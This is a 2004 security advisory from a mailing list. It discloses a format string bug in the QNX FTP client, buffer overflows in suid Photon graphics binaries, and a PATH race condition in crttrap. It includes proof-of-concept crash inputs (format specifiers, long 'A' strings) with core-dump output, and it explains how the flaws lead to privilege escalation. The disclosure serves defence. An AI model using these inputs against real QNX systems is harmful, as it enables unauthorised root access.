The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Multiple Vulnerabilities in the QNX Platform
------------------------------------------------------------------------
SUMMARY
" <http://www.qnx.com/products/rtos> QNX Software Systems has provided OS
technology, development tools, and professional services to companies
building mission-critical embedded systems. Since 1980 manufacturers have
relied on QNX OS technology to power their missioncritical applications -
everything from medical instruments and Internet routers to telematics
devices, 9-1-1 call centers, process control applications and air traffic
control systems. Small or large, simple or distributed, these systems
share an unmatched reputation for operating 24 hours a day, 365 days a
year, nonstop .
Multiple vulnerabilities in several components in the QNX system allows a
local or remote user to escalate privileges and run malicious machine code
on the target machine.
DETAILS
* Format String Vulnerability in QNX FTP Client:
QNX 6.1 FTP client is vulnerable to a format string in 'quote' command. If
successfully exploited, memory corruption occurs and attackers can obtain
'bin' group privileges. This kind of privilege can be useful for back
dooring purposes, for example.
Example:
# ftp 127.0.0.1
Connected to 127.0.0.1.
220 sandimas FTP server (Version 5.60) ready.
Name (127.0.0.1:root): sandimas
331 Password required for sandimas.
Password:
230 User sandimas logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote site exec "%p.%p.%p.%p"
500 'SITE EXEC 805b730.0.0.805b180': command not understood.
ftp> quote "%s.%s.%s.%s"
Memory fault (core dumped)
#
* Multiple Buffer Overflows in Photon Graphics Library:
Buffer overflows conditions occurs in four binaries of Photon. The result
of a well-succeeded exploitation is memory corruption - in other words, a
high risk for local security. Once these binaries are suid and owned by
root, then malicious users can obtain unauthorized root privileges. All
problems lies in '-s' (server) flag, which allows an user to chose the
name of the Photon server. The vulnerable binary tries to open
/dev/AAAAA... (around 94 A's are necessary to cause overflow) then it
crashes.
Example:
=> Config for phrelay (remote connector with phindows and phditto clients)
$ /usr/photon/bin/phrelay-cfg -s AAAAA[...]
Memory fault (core dumped)
-> Localization utility, timezone, language and keyboard configurator
$ /usr/photon/bin/phlocale -s AAAAA[...]
Memory fault (core dumped)
-> QNX Package Installer
$ /usr/photon/bin/pkg-installer -s AAAAA[...]
Memory fault (core dumped)
PS: 'pkg-installer' was replaced by 'qnxinstall' in QNX Momentics 6.2.1.
-> Mouse configurator and stuff
$ /usr/photon/bin/input-cfg -s AAAAA[...]
Memory fault (core dumped)
Core files are generated in /var/dumps.
* Possible Race Condition in crrtrap Video Hardware Detection Tool:
Crttrap runs a sequence of commands before the call to 'io-graphics', an
external program part of the Photon graphics library. Because of this,
there is a theoretical race condition vulnerability.
(1) /bin/cd /usr/photon/bin
(*)
(2) io-graphics [arguments]
This spot (*) is where the race condition lies. If we are able to modify
$PATH in the exact moment before crrtrap calls step 2, we could obtain
local root privileges because it will execute 'io-graphics' (our code)
looking for it in /tmp directory. If an attacker writes a code for a never
ending loop changing every time $PATH and runs it into background, there
is a theoretical possibility to modify environment and trick crttrap.
Disclosure Timeline:
15 Aug 2004: FTP Client vulnerability detected;
26 Aug 2004: Photon and crrtrap vulnerabilities detected;
08 Sep 2004: rfdslabs contacts QNX: no success
ADDITIONAL INFORMATION
The information has been provided by <mailto:julio@rfdslabs.com.br> Julio
Cesar Fort.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
